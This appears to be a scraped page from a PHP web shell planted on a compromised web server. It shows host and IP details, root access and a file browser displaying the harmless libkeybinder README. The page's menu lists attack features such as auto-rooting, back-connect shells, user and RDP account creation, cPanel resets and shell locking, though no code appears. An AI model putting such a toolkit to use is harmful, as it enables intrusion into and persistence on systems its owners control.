Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libkeybinder0 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
170
B
-rw-r--r--
README
2.35
KB
-rw-r--r--
changelog.Debian.gz
1.59
KB
-rw-r--r--
copyright
2.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
libkeybinder ============ :Author: Ulrik Sverdrup <ulrik.sverdrup@gmail.com> **keybinder** is a library for registering global keyboard shortcuts. Keybinder works with GTK-based applications using the X Window System. The library contains: * A C library, ``libkeybinder`` * Gobject-Introspection (gir) generated bindings * Lua bindings, ``lua-keybinder`` * Python bindings, ``python-keybinder`` * An ``examples`` directory with programs in C, Lua, Python and Vala. Compile and Installation Notes ------------------------------ The package ``keybinder`` compiles against GTK+ 2 while the package ``keybinder-3.0`` compiles against GTK+ 3. The two packages can be installed in parallel. Both packages support generating gobject-introspection (gir) bindings, even if these bindings are more relevant for the future, hence the GTK+ 3 package. For ``keybinder-3.0``, the gir bindings are strongly recommended over any other language bindings. ``keybinder`` includes ``python-keybinder`` which are static python (PyGTK 2) bindings. If you don't have the neccessary dependencies, and don't want to build the python bindings, you have to explicitly disable them using the ``--disable-python`` option with configure. ``keybinder`` and ``keybinder-3.0`` include experimental static lua bindings. It is possible you need to tell configure where Lua includes are to be found using (adjusting the path appropriately):: ./configure CPPFLAGS=-I/usr/include/lua5.1 If you want to compile with reduced library linking, configure using:: CC="cc -Wl,--as-needed" ./configure Build Requirements ------------------ * GTK+ 3.0 (``keybinder-3.0``) or GTK+ 2.20 (``keybinder``) * gobject-introspection * gtk-doc 1.14 * Python 2.5, pygobject 2.15.3, pygobject-codegen-2.0 for ``python-keybinder`` History ------- This library originates in `Tomboy`_ and has been widely reused without having a separate release. This package has taken the python bindings from the `Deskbar Applet`_ project, and broken it out to a standalone project. The library was subsequently rewritten in major parts. The module is licenced under the GNU General Public License v2 (or at your option, any later version), see the included file COPYING for details. .. _Tomboy: http://projects.gnome.org/tomboy/ .. _`Deskbar Applet`: http://projects.gnome.org/deskbar-applet/ .. vim: ft=rst tw=72
Close